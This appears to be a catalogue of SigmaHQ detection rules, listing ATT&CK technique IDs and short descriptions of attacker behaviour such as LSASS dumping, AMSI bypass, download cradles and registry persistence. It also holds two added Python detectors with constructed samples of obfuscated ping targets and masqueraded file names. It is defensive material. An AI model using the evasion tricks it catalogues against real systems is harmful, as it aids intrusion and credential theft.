Sysmon registry detection of a local hidden user account.

SigmaHQ source
T1036
imProcessCreate

Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of e

SigmaHQ source
T1218
imProcessCreate

Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of new Office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled doc

SigmaHQ source
T1216
imProcessCreate

Detects the execution of CustomShellHost.exe where the child process is not 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion technique

evasion
SigmaHQ source
T1105
imProcessCreate

Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for exam

SigmaHQ source
T1090.003
imProcessCreate

Detects the use of Tor or Tor-Browser to connect to onion routing networks

SigmaHQ source
T1546.015
imRegistry

Detects COM object hijacking via TreatAs subkey

SigmaHQ source
T1037.001
imRegistry

Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors

persistence
SigmaHQ source
imRegistry

Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections. Attackers may add custom AMSI providers to persist on the system and

evasion, persistence
SigmaHQ source
T1588.002
imRegistry

Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key

SigmaHQ source
T1588.002
imRegistry

Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.

lateral-movement
SigmaHQ source
T1588.002
imRegistry

Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)

SigmaHQ source
T1003.001, T1003.002, T1003.003, T1003.004, T1003.005
imFileEvent

Detects the creation of files with well-known filenames (parts of credential dumping software or files produced by it).

SigmaHQ source
T1685
imRegistry

Detects when the "index" value of a scheduled task is removed or deleted from the registry, which effectively hides it from tooling such as "schtasks /query".

SigmaHQ source
T1685
imRegistry

Detects removal of the SD (Security Descriptor) value under the \Schedule\TaskCache\Tree registry key to hide a scheduled task. This technique is used by Tarrask malware.

SigmaHQ source
T1082
imProcessCreate

Detects attempts to query system information directly from the Windows Registry.

SigmaHQ source
T1018, T1087.002, T1482, T1069.002
imProcessCreate

Detects AdFind execution with common flags seen used during attacks

SigmaHQ source
T1021.003, T1218
imProcessCreate

Detects suspicious Speech Runtime binary execution by monitoring its child processes. Child processes spawned by SpeechRuntime.exe could indicate an attempt at lateral movement via COM & DCOM hijacki

lateral-movement
SigmaHQ source
T1685, T1569.002
imRegistry

Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.

SigmaHQ source
T1547.001
imRegistry

Detects modification of Windows Registry Classes keys used for persistence. Adversaries modify these autostart extensibility points (ASEP) to execute malicious code when file types are opened or actio

persistence
SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1112
imRegistry

Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted si

persistence
SigmaHQ source
T1021.006
imProcessCreate

Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.

lateral-movement
SigmaHQ source
T1546.011
imRegistry

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework

backdoorpersistence
SigmaHQ source
T1564.001
imRegistry

Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

persistence
SigmaHQ source
T1053.005
imProcessCreate

Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.

SigmaHQ source
T1053T1053.005
imRegistry

Detects the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process other than svchost.exe, which is suspicious.

SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1003.001
imProcessCreate

Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory. It is often used by threat ac

credential-theft, exploit, lateral-movement
SigmaHQ source
T1528, T1552.001
imProcessCreate

Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". JWT tokens are often used for access-tokens across various applications and services like M

lateral-movement
SigmaHQ source
T1505.003, T1190
imFileEvent

Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells o

SigmaHQ source
T1059.001
imProcessCreate

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine

powershell
SigmaHQ source
T1564.004
imProcessCreate

Detects use of Windows 8.3 short names, which could be used as a method to avoid image-based detection.

SigmaHQ source
T1003
imRegistry

Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the co

SigmaHQ source
T1059.001
imProcessCreate

Detects the use of various CLI utilities exfiltrating data via web requests

backdoor
SigmaHQ source
T1036, T1003.001
imProcessCreate

Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump. This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LS

credential-theft, lateral-movement
SigmaHQ source
T1016
imProcessCreate

Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems

backdoor
SigmaHQ source
T1134, T1003, T1027
imProcessCreate

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

SigmaHQ source
T1218, T1021.003
DeviceImageLoadEvents

Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious, publicly writable locations, which could indicate an attempt at lateral movement via BitLocker DCOM &

credential-theft, lateral-movement
SigmaHQ source
T1562.001
imProcessCreate

Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator,

SigmaHQ source
T1218, T1021.003
imProcessCreate

Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes. Suspicious child processes spawned by baaupdate.exe could i

lateral-movement
SigmaHQ source
T1562.012
imProcessCreate

Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable

SigmaHQ source
T1204.002
imFileEvent

Detects the creation of files with an executable or script extension by an Office application.

SigmaHQ source
T1653
imProcessCreate

Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or

SigmaHQ source
imNetworkSession

Detects an office suite application (Word, Excel, PowerPoint, Outlook) communicating with target systems over uncommon ports.

SigmaHQ source
T1203
imNetworkSession

Detects an office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address. This rule aims to detect traffic similar to that seen exploited in CVE-2021-42

exploit
Ping Hex IP
sigma high
SigmaHQ source
T1140, T1027
imProcessCreate

Detects a ping command that uses a hex encoded IP address
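
Windows ping resolves its target with inet_addr() semantics, so the hex form the rule above looks for is only one of several non-dotted-quad spellings (a single 32-bit decimal, octal octets with a leading 0, or fewer than four parts) that all reach the same host. The Python below is an added example, not the SigmaHQ rule: it decodes a target the way inet_addr() would and flags any spelling that differs from the canonical dotted quad, which generalises the rule beyond the 0x case. The sample command lines are constructed.

```python
def _parse_part(part):
    """One dotted component as inet_addr() reads it: 0x.. hex, leading 0 octal, else decimal."""
    if not part or "_" in part or part[0] in "+-":
        return None
    try:
        if part[:2].lower() == "0x":
            return int(part[2:], 16)
        if len(part) > 1 and part[0] == "0":
            return int(part, 8)
        return int(part, 10)
    except ValueError:
        return None


def decode_inet_addr(token):
    """Return the dotted quad an inet_addr()-style parser resolves `token` to, or None.
    One to four parts are accepted; the last part fills all remaining low-order bytes,
    so "0x7f000001", "2130706433", "0177.0.0.1" and "127.1" all mean 127.0.0.1."""
    parts = token.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *leading, last = values
    if any(v > 0xFF for v in leading):
        return None
    last_bits = 8 * (5 - len(values))          # 32, 24, 16 or 8 bits for the final part
    if last >= 1 << last_bits:
        return None
    number = 0
    for v in leading:
        number = (number << 8) | v
    number = (number << last_bits) | last
    return "%d.%d.%d.%d" % ((number >> 24) & 0xFF, (number >> 16) & 0xFF,
                            (number >> 8) & 0xFF, number & 0xFF)


def scan_ping(cmdline):
    """Flag a Windows ping whose target is written in a non-canonical numeric form."""
    tokens = cmdline.split()
    if len(tokens) < 2:
        return None
    image = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in ("ping", "ping.exe"):
        return None
    target = tokens[-1]                          # Windows ping syntax: ping [options] target_name
    decoded = decode_inet_addr(target)
    if decoded is None or decoded == target:
        return None
    return target, decoded


def scan_all(cmdlines):
    """Return (command line, target as written, resolved address) for every flagged command."""
    findings = []
    for c in cmdlines:
        result = scan_ping(c)
        if result:
            findings.append((c,) + result)
    return findings


# Constructed sample process command lines (not real telemetry).
SAMPLE_CMDLINES = [
    "ping 0x7f000001",                               # hex form, the case the rule targets
    "ping.exe -n 1 2130706433",                      # plain 32-bit decimal
    r"C:\Windows\System32\PING.EXE 0177.0.0.1",      # octal first octet
    "ping -n 2 127.1",                               # two-part form
    "ping -n 1 127.0.0.1",                           # canonical, not flagged
    "ping dc01.corp.example",                        # hostname, not flagged
]

if __name__ == "__main__":
    for cmdline, written, resolved in scan_all(SAMPLE_CMDLINES):
        print("%-45s %s -> %s" % (cmdline, written, resolved))
```

Hostnames fall out naturally because their labels do not parse as numbers; the check only fires when a numeric target decodes to something other than the text that was typed.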

SigmaHQ source
T1112, T1491.001
imRegistry

Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

ransomware
SigmaHQ source
T1048, T1567.002
imProcessCreate

Detects the execution of the Restic backup tool, which can be used for data exfiltration. Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, includ

backdoor
SigmaHQ source
T1048.003
imProcessCreate

Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a w

SigmaHQ source
T1490
DeviceImageLoadEvents

Detects the image load of VSS DLL by uncommon executables

SigmaHQ source
T1059.001, T1021.003
DeviceImageLoadEvents

Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.

SigmaHQ source
T1218
imProcessCreate

Detects usage of the "ssh.exe" binary as a proxy to launch other programs.

SigmaHQ source
T1070.002
imProcessCreate

Detects specific commands commonly used to remove or empty the syslog, a technique often used by attackers to hide their tracks.

SigmaHQ source
T1204.002, T1547.001
imFileEvent

Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat,

SigmaHQ source
T1202
imProcessCreate

Detects the use of Kali Linux through Windows Subsystem for Linux

SigmaHQ source
T1546.007
imRegistry

Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

persistence
SigmaHQ source
T1055
imProcessCreate

Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)

cobalt-strike
SigmaHQ source
T1057
imProcessCreate

Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often tim

SigmaHQ source
DeviceImageLoadEvents

Detects loading of "Amsi.dll" by a living-off-the-land process. This could be an indication of a "PowerShell without PowerShell" attack.

SigmaHQ source
imRegistry

Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.

SigmaHQ source
T1105, T1564.003
imProcessCreate

Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files

SigmaHQ source
imProcessCreate

Detects the execution of LaZagne, a utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump cre

credential-theft
SigmaHQ source
imRegistry

Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing

SigmaHQ source
T1543.003
imProcessCreate

Detects creation of a new service (kernel driver) with the type "kernel"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "dbghelp.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe

SigmaHQ source
T1036.003
imRegistry

Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot.

backdoor
SigmaHQ source
T1204.002
imProcessCreate

Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe Reader or Microsoft Office, and connects to a web application over http(s). This cou

phishing
SigmaHQ source
imProcessCreate

Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution

SigmaHQ source
T1059.001
DeviceImageLoadEvents

Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.

SigmaHQ source
imFileEvent

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process

SigmaHQ source
T1218
imProcessCreate

Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

SigmaHQ source
imFileEvent

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by PowerShell to test against AppLocker.

SigmaHQ source
T1685
imRegistry

Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.

SigmaHQ source
T1112
imRegistry

Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could

SigmaHQ source
T1053.005
imProcessCreate

Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware

SigmaHQ source
T1112
imRegistry

Detects the creation of a service with a service binary located in a suspicious directory

SigmaHQ source
T1036
imFileEvent

Detects Windows executables that write files with suspicious extensions

SigmaHQ source
T1547.001
imRegistry

Detects suspicious new RUN key element pointing to an executable in a suspicious folder

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of "dbgcore.dll"

SigmaHQ source
T1068
imProcessCreate

Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute comman

SigmaHQ source
T1070.003
imRegistry

Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. In the clickfix techniques, the phishing lures instruct users to open a run dialog

phishing
SigmaHQ source
T1083, T1552.001
imProcessCreate

Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende

SigmaHQ source
T1083, T1552.001
imProcessCreate

Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende

SigmaHQ source
T1543.003
imProcessCreate

Detects the creation of a new service using the "sc.exe" utility.

SigmaHQ source
imFileEvent

Detects creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate possible persistence.

SigmaHQ source
T1587.001
imProcessCreate

Detects potential PsExec commands that initiate execution on remote systems via common command-line flags used by the utility

lateral-movement
signature-base source

Detects ELF obfuscation technique used by Sindoor dropper related to APT 36

apt, evasion, florian-roth
SigmaHQ source
T1219
imProcessCreate

Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attack

apt
SigmaHQ source
T1112
imProcessCreate

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote

credential-theft
SigmaHQ source
T1027.002
DeviceImageLoadEvents

Detects the image load of "Python Core" by a non-Python process. This might be indicative of the execution of an executable that has been bundled from Python code. Various tools like Py2Exe, PyInstaller, a

evasion
SigmaHQ source
T1547.001, T1112
imRegistry

Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict acc

evasion
SigmaHQ source
T1112, T1059.005
imProcessCreate

Detects attempts to modify the registry using VBScript's CreateObject("Wscript.shell") and RegWrite methods via common LOLBINs. It could be an attempt to modify the registry for persistence without us

persistence, powershell
SigmaHQ source
T1036
imProcessCreate

Detects a potentially suspicious execution of a process located in the '/tmp/' folder

SigmaHQ source
T1595
imWebSession

Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string.

SigmaHQ source
T1567, T1572, T1102
imNetworkSession

Detects an executable initiating a network connection to "ngrok" domains. Attackers have been seen using ngrok to stage their second-stage payloads and malware. While communication with suc

backdoor
SigmaHQ source
T1564.006, T1564
imProcessCreate

Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.

backdoor
SigmaHQ source
T1190, T1505.003
imFileEvent

Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabil

SigmaHQ source
T1036.007
imFileEvent

Detects dropped files with double extensions, a method often used by malware to abuse the fact that Windows hides known file extensions by default.

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspic

SigmaHQ source
T1059.001, T1105
imProcessCreate

Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.

powershell
SigmaHQ source
T1059
imProcessCreate

Detects PowerShell download and execution cradles.

powershell
SigmaHQ source
T1547.001
imRegistry

Detects potential PowerShell commands or code within registry run keys

powershell
SigmaHQ source
T1547.001
imFileEvent

Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been asso

SigmaHQ source
T1560.001
imProcessCreate

Detects a suspicious WinRAR execution in a folder which is not the default installation folder

SigmaHQ source
T1546.015
imRegistry

Detect modification of TreatAs key to enable "rundll32.exe -sta" command

SigmaHQ source
T1685
imProcessCreate

Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). This is a highly

backdoor, evasion, powershell
SigmaHQ source
T1490
DeviceImageLoadEvents

Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. It is often abused by attackers to

SigmaHQ source
T1685
imRegistry

Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. This is a highly suspicious configuration change that effectiv

backdoor, evasion
SigmaHQ source
T1087.002, T1069.002, T1482
imFileEvent

Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

SigmaHQ source
imFileEvent

Detects PowerShell creating a binary executable or a script file.

SigmaHQ source
T1003.001
imProcessCreate

Detects the execution of the Doppelanger hacktool which is used to dump LSASS memory via process cloning while evading common detection methods

credential-theft
SigmaHQ source
T1055.012
imProcessCreate

Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing. It replaces the memory of a legitimate process with custom shellcode

SigmaHQ source
T1557.001, T1187
imProcessCreate

Detects the presence of "UWhRC....AAYBAAAA" pattern in command line. The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION struct

credential-theft, exploit
SigmaHQ source
T1059.004, T1203
imProcessCreate

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution

SigmaHQ source
T1574.007, T1548.002
DeviceImageLoadEvents

Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. This technique tricks Windows into treat

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects indicators of a UAC bypass method by mocking directories

evasion
SigmaHQ source
T1592.004
imProcessCreate

Detects the execution of text-based file access or inspection utilities to read the content of /etc/sudoers, potentially in order to list all users that have sudo rights.

SigmaHQ source
T1112
imRegistry

Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)

SigmaHQ source
T1069.001
imProcessCreate

Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings

SigmaHQ source
T1566.001
imProcessCreate

Detects suspicious use of an .exe extension after a non-executable file extension (e.g. .pdf.exe) or after a run of spaces or underscores, used to cloak the executable file in spear-phishing campaigns

phishing
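
Three entries in this list (Windows 8.3 short names in an image path, dropped files with double extensions, and an .exe cloaked behind a document extension or a run of spaces or underscores) inspect the same field, the image or file path. The Python below is an added example and not rule code from SigmaHQ: one classifier that applies all three indicators to constructed sample paths. The extension lists and the padding threshold are assumptions made for the example.

```python
import re

EXEC_EXTS = r"(?:exe|scr|com|pif|bat|cmd|vbs|js|hta|ps1|lnk)"
DOC_EXTS = r"(?:pdf|docx?|xlsx?|pptx?|rtf|txt|jpe?g|png|gif|zip|rar|mp[34])"
MIN_PAD = 5   # assumption: spaces/underscores before the extension that count as cloaking

DOUBLE_EXT = re.compile(r"\." + DOC_EXTS + r"\." + EXEC_EXTS + r"$", re.IGNORECASE)
PADDED_EXT = re.compile(r"[ _]{%d,}\." % MIN_PAD + EXEC_EXTS + r"$", re.IGNORECASE)
# An 8.3 component: up to six name characters, "~", a number, optional 1-3 char extension (PROGRA~1, ALICE~1)
SHORT_NAME = re.compile(r"^[^\s.\\]{1,6}~\d{1,3}(\.[^.\\]{1,3})?$", re.IGNORECASE)


def classify(path):
    """Return the masquerade indicators found in a Windows image or file path."""
    components = path.replace("/", "\\").split("\\")
    name = components[-1]
    hits = []
    if DOUBLE_EXT.search(name):
        hits.append("double_extension")
    if PADDED_EXT.search(name):
        hits.append("padded_extension")
    if any(SHORT_NAME.match(c) for c in components):
        hits.append("short_name_8dot3")
    return hits


def scan_paths(paths):
    """Return (path, indicators) for every path that triggers at least one indicator."""
    results = []
    for p in paths:
        hits = classify(p)
        if hits:
            results.append((p, hits))
    return results


# Constructed sample paths (not real telemetry): five suspicious, two ordinary.
SAMPLE_PATHS = [
    r"C:\Users\alice\Downloads\invoice_2024.pdf.exe",
    r"C:\Users\alice\Downloads\Report.docx                    .exe",
    r"C:\Users\alice\AppData\Local\Temp\photo________.scr",
    r"C:\PROGRA~1\Malware\update.exe",
    r"C:\Users\ALICE~1\AppData\Local\Temp\svchost.exe",
    r"C:\Program Files\Vendor\app.exe",
    r"C:\Users\alice\Documents\notes.txt",
]

if __name__ == "__main__":
    for path, hits in scan_paths(SAMPLE_PATHS):
        print(path, hits)
```

Short names are also used legitimately by installers and older software, so the 8.3 indicator is best combined with the path's location or the parent process rather than alerted on alone.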
SigmaHQ source
T1219, T1105
imProcessCreate

Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. These parameters configure the agent to connect to a specific RMM server with authentic

backdoor
SigmaHQ source
T1552.002
imProcessCreate

Detects processes that query known 3rd party registry keys that hold credentials via the command line

backdoor, credential-theft
SigmaHQ source
T1204, T1059.007, T1105
imFileEvent

Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing its own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potential

SigmaHQ source
T1555.003, T1217
imFileEvent

Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract

SigmaHQ source
T1003.001
imFileEvent

Detects file creation events with filename patterns used by Impacket.

SigmaHQ source
T1219.002
imProcessCreate

Detects potential execution of MeshAgent which is a tool used for remote access. Historical data shows that threat actors rename MeshAgent binary to evade detection. Matching command lines with the '-

SigmaHQ source
T1059.001, T1685
imProcessCreate

Detects the execution of a specific one-liner to download and execute PowerShell modules in memory.

powershell
SigmaHQ source
T1218, T1202, T1036.005
imProcessCreate

Detects binaries that use the same name as legitimate sysinternals tools to evade detection. This rule looks for the execution of binaries that are named similarly to Sysinternals tools. Adversary may

SigmaHQ source
T1685.001, T1112
imRegistry

Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events. Windows Event Log is a service that collects and stores event logs from the

backdoor
SigmaHQ source
T1552.001
imProcessCreate

Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). This can give access to plaintext passwords used in PowerShell commands or used

powershell
SigmaHQ source
T1204.002
imProcessCreate

Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 c

evasion, exploit
SigmaHQ source
T1059
imProcessCreate

Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

SigmaHQ source
T1106
imProcessCreate

Detects the use of WinAPI functions via the command line, as seen used by threat actors via the tool winapiexec

SigmaHQ source
T1036.003, T1036.005
imProcessCreate

Detects suspicious parent processes of well-known Windows processes

SigmaHQ source
T1059.001, T1027
imProcessCreate

Detects suspicious encoded character syntax often used for defense evasion

evasion, powershell
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "mscorsvc.dll".

SigmaHQ source
T1127
imProcessCreate

Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

SigmaHQ source
T1127
imProcessCreate

Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.

SigmaHQ source
T1219.002
imProcessCreate

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target

SigmaHQ source
T1219.002
imProcessCreate

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target

SigmaHQ source
T1219.002
imNetworkSession

Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.

SigmaHQ source
T1219.002
imFileEvent

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a l

SigmaHQ source
T1102
imNetworkSession

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

SigmaHQ source
T1083
imProcessCreate

Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.

credential-theft
SigmaHQ source
T1547.001
imProcessCreate

Detects suspicious reg.exe command lines adding a value to the Run key in the registry

persistence
SigmaHQ source
T1547.001
imRegistry

Detects suspicious Run keys created by software located in the Downloads folder or in temporary Outlook/Internet Explorer directories

SigmaHQ source
T1053.005
imProcessCreate

Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges

SigmaHQ source
T1036.002
imFileEvent

Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.

SigmaHQ source
T1059.005, T1218.014
DeviceImageLoadEvents

Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt to execute malicious scripts within a trusted system process for

evasion
SigmaHQ source
T1046
imProcessCreate

Detects usage of NimScan, a portscanner utility. In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment. This rule identifies t

SigmaHQ source
T1053.005, T1218, T1105
imProcessCreate

Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. This facilitates executing malicious paylo

powershell
WCE wceaux.dll Access
sigma critical
SigmaHQ source
T1003
imRegistry

Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host

SigmaHQ source
T1204
imFileEvent

Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.

SigmaHQ source
T1003.001
imProcessCreate

Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

credential-theft
SigmaHQ source
T1055.001
imProcessCreate

Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution

backdoor
SigmaHQ source
T1036, T1055.001, T1202, T1218
imProcessCreate

Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execut

backdoor
SigmaHQ source
T1059
DeviceImageLoadEvents

Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVE exploits that target the Common Log File System.

SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs

SigmaHQ source
T1059
imProcessCreate

Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1059, T1203
imProcessCreate

